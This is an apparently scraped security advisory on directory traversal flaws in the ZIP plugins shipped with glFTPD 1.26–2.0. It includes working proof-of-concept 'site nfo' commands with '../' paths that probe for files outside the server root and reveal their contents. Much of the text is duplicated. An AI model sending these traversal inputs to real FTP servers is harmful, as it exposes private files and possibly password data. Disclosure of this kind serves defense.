glFTPD ZIP Plugins Multiple Directory Traversal Vulnerabilities
BID:12586
Info
glFTPD ZIP Plugins Multiple Directory Traversal Vulnerabilities
| Bugtraq ID: | 12586 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 18 2005 12:00AM |
| Updated: | Feb 18 2005 12:00AM |
| Credit: | Discovery is credited to Paul Craig <[email protected]>. |
| Vulnerable: |
GlFtpd GlFtpd 2.0 RC7 GlFtpd GlFtpd 2.0 RC6 GlFtpd GlFtpd 2.0 RC5 GlFtpd GlFtpd 2.0 RC4 GlFtpd GlFtpd 2.0 RC3 GlFtpd GlFtpd 2.0 RC2 GlFtpd GlFtpd 2.0 RC1 GlFtpd GlFtpd 2.0 GlFtpd GlFtpd 1.32 GlFtpd GlFtpd 1.31 GlFtpd GlFtpd 1.29.1 GlFtpd GlFtpd 1.28 GlFtpd GlFtpd 1.27 GlFtpd GlFtpd 1.26 |
| Not Vulnerable: | |
Discussion
glFTPD ZIP Plugins Multiple Directory Traversal Vulnerabilities
It is reported that various ZIP related plugins supplied with the server contain multiple directory traversal vulnerabilities. These issues may allow remote attackers to determine the existence of files on a computer and also disclose arbitrary files. The issues arise due to insufficient sanitization of user-supplied data.
By determining the presence of files in restricted directories and outside the server's root in addition to disclosing the contents of arbitrary files, the attacker can launch various attacks against a vulnerable computer. If an attack results in the disclosure of a password file, these issues may ultimately lead to unauthorized access to the affected computer in the context of the server.
The affected plugins are shipped with the FTP server by default. glFTPD 1.26 to 2.00 are reported vulnerable.
It is reported that various ZIP related plugins supplied with the server contain multiple directory traversal vulnerabilities. These issues may allow remote attackers to determine the existence of files on a computer and also disclose arbitrary files. The issues arise due to insufficient sanitization of user-supplied data.
By determining the presence of files in restricted directories and outside the server's root in addition to disclosing the contents of arbitrary files, the attacker can launch various attacks against a vulnerable computer. If an attack results in the disclosure of a password file, these issues may ultimately lead to unauthorized access to the affected computer in the context of the server.
The affected plugins are shipped with the FTP server by default. glFTPD 1.26 to 2.00 are reported vulnerable.
Exploit / POC
glFTPD ZIP Plugins Multiple Directory Traversal Vulnerabilities
An exploit is not required.
The following proof of concept examples are available:
To determine the existence of a file out side the server's root:
site nfo ../etc/group
To determine the existence of the first two files in a directory out side the server's root:
site nfo ../../../../../etc/*
To determine the existence of the first two files in a directory inside the server's root:
site nfo staff/*
To determine the existence of files in the directory tree:
site nfo ../../../../../etc/a*
To determine the existence of files in a ZIP archive:
site nfo ../../*.zip
To disclose the contents of files with names starting with the letter 'p' in a directory:
site nfo ../../backup.zip p*
An exploit is not required.
The following proof of concept examples are available:
To determine the existence of a file out side the server's root:
site nfo ../etc/group
To determine the existence of the first two files in a directory out side the server's root:
site nfo ../../../../../etc/*
To determine the existence of the first two files in a directory inside the server's root:
site nfo staff/*
To determine the existence of files in the directory tree:
site nfo ../../../../../etc/a*
To determine the existence of files in a ZIP archive:
site nfo ../../*.zip
To disclose the contents of files with names starting with the letter 'p' in a directory:
site nfo ../../backup.zip p*
Solution / Fix
glFTPD ZIP Plugins Multiple Directory Traversal Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
glFTPD ZIP Plugins Multiple Directory Traversal Vulnerabilities
References:
References: